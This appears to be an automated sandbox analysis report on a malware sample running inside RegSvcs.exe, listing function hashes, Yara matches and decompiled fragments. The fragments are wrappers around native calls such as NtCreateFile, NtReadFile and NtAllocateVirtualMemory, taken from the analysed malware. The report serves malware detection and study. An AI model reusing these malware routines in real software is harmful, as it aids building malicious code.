                                                • Instruction ID: dbbc5091fb446637910a563eeacd2842136f2b1f42c760e8ec348c07afe5573c
                                                • Opcode Fuzzy Hash: f3fa16786687011bd9a08694fe3083e0fc998bddbe896881cb926f4c2f024f48
                                                • Instruction Fuzzy Hash: 6811DD75508284DFCB01CF50D9C0B15FBB1FB88328F28C6ADD9495B6A6C33AD85ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EDD745, Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321861481.0000000000EDD000.00000040.00000001.sdmp, Offset: 00EDD000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f197b2b6ef283bf7bf5812ae55d03f5e485d0e928a2278db91b20fecc5525cf
                                                • Instruction ID: 502983f236ce14e8f5c255c6ddfde740194c31174d2dba93a05bbdcbd17dfc33
                                                • Opcode Fuzzy Hash: 6f197b2b6ef283bf7bf5812ae55d03f5e485d0e928a2278db91b20fecc5525cf
                                                • Instruction Fuzzy Hash: D801F7714083449AEB208E55CDC4BE7FBDCEF41378F18999BE9086E342D3799846C6B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EDD744, Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321861481.0000000000EDD000.00000040.00000001.sdmp, Offset: 00EDD000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ed885152c7af328b02c9bbe281eff6e4a343f1906ca11162a1880975f548d76
                                                • Instruction ID: e8ac4a9542616d7f5637e04c0a94f75604ebb1bb0efd4b636ba51d8ea8e2c49a
                                                • Opcode Fuzzy Hash: 0ed885152c7af328b02c9bbe281eff6e4a343f1906ca11162a1880975f548d76
                                                • Instruction Fuzzy Hash: EAF062714082449EE7108E15DCC4BA2FB98EB51778F18C59BED085B386D3799845CAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0296F298, Relevance: .3, Instructions: 315COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d79b7403c8e141de1d7e226caff2cf6522dec00b0092687ad7f0350a964d4279
                                                • Instruction ID: 91fb643f94a0d6c04b7425e195fa1dc57f9a9c028d28e2ff9d3f9baa85b14bc6
                                                • Opcode Fuzzy Hash: d79b7403c8e141de1d7e226caff2cf6522dec00b0092687ad7f0350a964d4279
                                                • Instruction Fuzzy Hash: C112D4F9C91F468BD730CF65E8C82893BE1B7613A8BD04A0AD2711BAD0D7B4116ACF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0296D064, Relevance: .3, Instructions: 265COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ffacc6a7d638c96b90f1527569009c422fd4742d8e6a5cf48c5862cd9b30595f
                                                • Instruction ID: 05d5397f30bdf38d3a84aeb4fe3203f22ff72d16c7a86cbb8904a954b480acc3
                                                • Opcode Fuzzy Hash: ffacc6a7d638c96b90f1527569009c422fd4742d8e6a5cf48c5862cd9b30595f
                                                • Instruction Fuzzy Hash: 1BA18036E002198FCF05DFA5C8489EEB7F6FF89300B15856AE915AB220EB71A955CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0296F288, Relevance: .2, Instructions: 223COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8c3f94e8a078354e4c94aa8c33bed9d6787a1cff48d106e892de7405fff472d
                                                • Instruction ID: 4e2d519800855231c9ec9d2fb4723de10dd73d71a5c0e8c2d1d8582b2eddd456
                                                • Opcode Fuzzy Hash: f8c3f94e8a078354e4c94aa8c33bed9d6787a1cff48d106e892de7405fff472d
                                                • Instruction Fuzzy Hash: 64C13EF9C51B468BD720CF65E9C82893BF1BB653A8F904B0AD2612B6D0D7B4106ACF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: RegSvcs.exe PID: 6388 Parent PID: 6952 RegSvcs.exeCOMMON

                                                Executed Functions

                                                Function 0041A410, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                0x0041a413
                                                0x0041a41f
                                                0x0041a427
                                                0x0041a42c
                                                0x0041a432
                                                0x0041a44d
                                                0x0041a455
                                                0x0041a459

                                                APIs
                                                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: 1JA$rMA$rMA
                                                • API String ID: 2738559852-782607585
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                0x0040ad0c
                                                0x0040ad0f
                                                0x0040ad14
                                                0x0040ad19
                                                0x0040ad23
                                                0x0040ad28
                                                0x0040ad2b
                                                0x0040ad2d
                                                0x0040ad35
                                                0x0040ad3a
                                                0x0040ad3a
                                                0x0040ad41
                                                0x0040ad49
                                                0x0040ad4c
                                                0x0040ad4e
                                                0x0040ad62
                                                0x00000000
                                                0x0040ad64
                                                0x0040ad6a
                                                0x0040ad1e
                                                0x0040ad1e
                                                0x0040ad1e

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A360, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                0x0041a36f
                                                0x0041a377
                                                0x0041a3ad
                                                0x0041a3b1

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A35A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E0041A35A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				asm("out 0x4b, al");
				 *0x8bec8b55 =  *0x8bec8b55 & __eax - 0x00000091;
				_t17 = _a4;
				_t3 = _t17 + 0xc40; // 0xc40
				E0041AF60(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}





                                                0x0041a35c
                                                0x0041a35e
                                                0x0041a363
                                                0x0041a36f
                                                0x0041a377
                                                0x0041a3ad
                                                0x0041a3b1

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 4c1dab46bbf7c46745513dc0aafacb6a154722b76769d3ac75d5f7c14c9d4464
                                                • Instruction ID: 673100d47236335912deda350666d624443bd4061020adb48b18bf9841d51fe6
                                                • Opcode Fuzzy Hash: 4c1dab46bbf7c46745513dc0aafacb6a154722b76769d3ac75d5f7c14c9d4464
                                                • Instruction Fuzzy Hash: FDF03CB2214188ABCB08CF98DC94CEB77E9FF8C314B14864DF94D93202C234E855CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A53A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E0041A53A(void* __eax, void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				asm("aas");
				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E0041AF60(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





                                                0x0041a53a
                                                0x0041a543
                                                0x0041a54f
                                                0x0041a557
                                                0x0041a579
                                                0x0041a57d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: bd376bfef061cab0a97c30ad5a0873b45623af1d1a654aa0f697c4ec41e07010
                                                • Instruction ID: e35a31d535c318765e5cfa7f0f0539095466f776623949456e43e1201cdd8b47
                                                • Opcode Fuzzy Hash: bd376bfef061cab0a97c30ad5a0873b45623af1d1a654aa0f697c4ec41e07010
                                                • Instruction Fuzzy Hash: 4AF01CB5200108AFCB14DF99CC80EE777A9EF8C354F158549FE5C97245C630E811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                0x0041a54f
                                                0x0041a557
                                                0x0041a579
                                                0x0041a57d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                0x0041a493
                                                0x0041a496
                                                0x0041a49f
                                                0x0041a4a7
                                                0x0041a4b5
                                                0x0041a4b9

                                                APIs
                                                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5f6caf816de5742320f4ee74f8d65f1cd6a7a57b1347929fbcec030017fcb89d
                                                • Instruction ID: 3425e064b3a2e3c90dc565ebb1796082dfdff26ac090ba3da0d7c88fa631eca5
                                                • Opcode Fuzzy Hash: 5f6caf816de5742320f4ee74f8d65f1cd6a7a57b1347929fbcec030017fcb89d
                                                • Instruction Fuzzy Hash: A4900265221000030105A9990B05507004AA7D5392391D021F1005550CD66188716161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2d04b31dcb9a8292e8356731078a7325091bd5474f69b5f4b4eb497225fbae62
                                                • Instruction ID: dcae15015a5e5ee1416efc6795afb1e9465e8eb5165374bf38efd9faba16439f
                                                • Opcode Fuzzy Hash: 2d04b31dcb9a8292e8356731078a7325091bd5474f69b5f4b4eb497225fbae62
                                                • Instruction Fuzzy Hash: 609002B121100402D140759948057470009A7D0342F91D011A5054554EC6998DE576A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e5478da9fd9a2d1041d79152eeb51b95e337fe2a72f658f3092e82c97d389c88
                                                • Instruction ID: 1989206e0facb0b53736b85e566cbb20cc137c05036ccdd12b9ef3a251a12b99
                                                • Opcode Fuzzy Hash: e5478da9fd9a2d1041d79152eeb51b95e337fe2a72f658f3092e82c97d389c88
                                                • Instruction Fuzzy Hash: 979002A121200003410575994815617400EA7E0242B91D021E1004590DC56588A17165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 672dad6b7daede5a7af966312699fd6898474d077d90870e6054c9fe56e84456
                                                • Instruction ID: f05d293dfed4152c3805a08bed5b017e1b316d8a06f746c4c8a1f08035b2067a
                                                • Opcode Fuzzy Hash: 672dad6b7daede5a7af966312699fd6898474d077d90870e6054c9fe56e84456
                                                • Instruction Fuzzy Hash: 529002A135100442D10065994815B070009E7E1342F91D015E1054554DC659CC627166
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e1a3e9cefb436560c67e679605f2941d149e2894fc5342eb1b7c18c6373a8383
                                                • Instruction ID: d1fb87eb03e81af681ee6d3d498f785adae4f9a477ecd79fbe0ee6ed33ab36e4
                                                • Opcode Fuzzy Hash: e1a3e9cefb436560c67e679605f2941d149e2894fc5342eb1b7c18c6373a8383
                                                • Instruction Fuzzy Hash: 2990027121100413D11165994905707000DA7D0282FD1D412A0414558DD6968962B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: af5fc50e2c282ff04eaa1488ddf74af91e7a659295f8f3542a8ccbd4d57ea4d1
                                                • Instruction ID: 457e626293cb2a3e1b3bc79f51ec9aa6c8e767df6e7b2378ca98269702207c2a
                                                • Opcode Fuzzy Hash: af5fc50e2c282ff04eaa1488ddf74af91e7a659295f8f3542a8ccbd4d57ea4d1
                                                • Instruction Fuzzy Hash: 3A900261252041525545B5994805507400AB7E02827D1D012A1404950CC5669866E661
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a40a55a09527c9cd6be42a7f25876693c1a584dbb6f62fd6b39bba55e5990a92
                                                • Instruction ID: d680b667d7d8c815e1f693243c0376637f9bc85b3bc5be0861b3e5278fa25755
                                                • Opcode Fuzzy Hash: a40a55a09527c9cd6be42a7f25876693c1a584dbb6f62fd6b39bba55e5990a92
                                                • Instruction Fuzzy Hash: 7890026161100502D10175994805617000EA7D0282FD1D022A1014555ECA6589A2B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ac76e1363ba454e17de3d1d453338fe566556b8b782bcd48089cfe8e872f9151
                                                • Instruction ID: b84c7316ab2359f595cc467ee906b79a20566e94c3af4a90c15f164ae3efa861
                                                • Opcode Fuzzy Hash: ac76e1363ba454e17de3d1d453338fe566556b8b782bcd48089cfe8e872f9151
                                                • Instruction Fuzzy Hash: 5690027121100402D10069D958096470009A7E0342F91E011A5014555EC6A588A17171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0d43694236938006ff7d6839d3ec2f91c6ba00df9eb29e125d80398f6ef67cd2
                                                • Instruction ID: c11ee03bde98c6f4e3bf752aa6f59242b91513d683ee49363b4ad7c1dd60b422
                                                • Opcode Fuzzy Hash: 0d43694236938006ff7d6839d3ec2f91c6ba00df9eb29e125d80398f6ef67cd2
                                                • Instruction Fuzzy Hash: F490026131100003D140759958196074009F7E1342F91E011E0404554CD95588666262
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 435de5d5411690fb1a1556bbc53e0e14065ce47f168e73aa107017081c8436a4
                                                • Instruction ID: 90776795165f096b863798208848856bd228f726c7d2e49d71dd278113650728
                                                • Opcode Fuzzy Hash: 435de5d5411690fb1a1556bbc53e0e14065ce47f168e73aa107017081c8436a4
                                                • Instruction Fuzzy Hash: D590026922300002D1807599580960B0009A7D1243FD1E415A0005558CC95588796361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1958f6eaef09dd0e129034e68a8de8c7a6aa1c44d42a5aea726db38894d4b505
                                                • Instruction ID: dd055110f4018c2a57f8a731e6e62e98fceeeb7d915c834fb9837a4afccae936
                                                • Opcode Fuzzy Hash: 1958f6eaef09dd0e129034e68a8de8c7a6aa1c44d42a5aea726db38894d4b505
                                                • Instruction Fuzzy Hash: BC90027121100802D1807599480564B0009A7D1342FD1D015A0015654DCA558A6977E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 901cd662f7d4579f0c5d670cf56533538ef88a302ac4a9caf6c4ebfbb358bb50
                                                • Instruction ID: 61a8ca431135660ab42c4eaf3ee46a2a39df90ff678f0cb2da99ba5e96072865
                                                • Opcode Fuzzy Hash: 901cd662f7d4579f0c5d670cf56533538ef88a302ac4a9caf6c4ebfbb358bb50
                                                • Instruction Fuzzy Hash: 4E90026122180042D20069A94C15B070009A7D0343F91D115A0144554CC95588716561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6e8d92cd79cf23786525a7f80eddd868d2c9040c2bdd248ca99d53cc3da81579
                                                • Instruction ID: c26420b599c98b3dde33660aaed177c0e2cd9241b5da802493edb7d6f8743421
                                                • Opcode Fuzzy Hash: 6e8d92cd79cf23786525a7f80eddd868d2c9040c2bdd248ca99d53cc3da81579
                                                • Instruction Fuzzy Hash: 1990026161100042414075A98C459074009BBE1252791D121A0988550DC599887566A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01629A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 74282ea4e946901213e41c17cf85f86cdd062d037d911e5f42f26304120a65f9
                                                • Instruction ID: f58e25fd310d42ece4a3b046e84b96a8e51bf02891f39e920ce8cc12c18d5cc7
                                                • Opcode Fuzzy Hash: 74282ea4e946901213e41c17cf85f86cdd062d037d911e5f42f26304120a65f9
                                                • Instruction Fuzzy Hash: 0990027121140402D10065994C1570B0009A7D0343F91D011A1154555DC665886175B1
                                                Uniqueness

